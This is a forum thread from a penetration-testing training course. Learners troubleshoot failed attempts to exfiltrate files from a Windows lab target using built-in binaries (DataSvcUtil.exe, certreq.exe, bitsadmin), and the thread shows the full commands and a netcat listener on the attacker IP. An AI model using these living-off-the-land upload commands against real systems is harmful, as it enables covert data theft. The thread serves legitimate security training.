File Transfer - Living off the land

HTB Content Academy
1

HTB:

Resources:
https://lolbas-project.github.io/#/upload

Experimenting with various upload methods and I can’t seem to get any of them to work. They all have similar behavior. I start a netcat session:

sudo nc -lvnp 80

I then follow the commands on the LOLBAS page, for example:

PS C:\Users\htb-student> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\DataSvcUtil.exe /out:C:\Users\htb-student\Test.txt /uri:http://10.10.16.50/test.txt

My netcat session detects a connection, but no file is uploaded.

└─$ sudo nc -lvnp 80
listening on [any] 80 ...
connect to [10.10.16.50] from (UNKNOWN) [10.129.201.55] 49679
GET /test.txt/$metadata HTTP/1.1
Host: 10.10.16.50
Connection: Keep-Alive
2

Attempting to use certreq.exe gives a different error:

C:\Windows\System32\certreq.exe -Post -config http://10.10.16.50/ C:\Users\htb-student\Test.txt

Certificate Request Processor: The parameter is incorrect. 0x80070057 (WIN32: 87 ERROR_INVALID_PARAMETER)
3

I’m feeling your pain here at the moment!

Certificate Request Processor: The parameter is incorrect. 0x80070057 (WIN32: 87 ERROR_INVALID_PARAMETER)

I believe the reason for that is an older version of CertReq. They do give a link to a new version of it in the article, however that obviously means we need to find another way to download THAT file to the computer.

Since I really wanted to try to get the CertReq working, I just used wget get download the newer exe. Unfortunately I then hit another obstacle - I realised that this requires it to be a POST request, and serving up the file via a Python web server or the like doesn’t do this by default.

I tried using bitsadmin as per instructions in the same academy section, and that gave its own unique types of errors (The parameter is incorrect.).

I do think it would be helpful if the exercises could be run on a target machine that actually had working versions of the methods that we’re being told to practice with. There’s “learning based on practice” and then there’s “learning based on hitting your head against a wall”.

4

I totally agree!

Glad it wasn’t just me. Never found a solution to this. Eventually I gave up and moved on!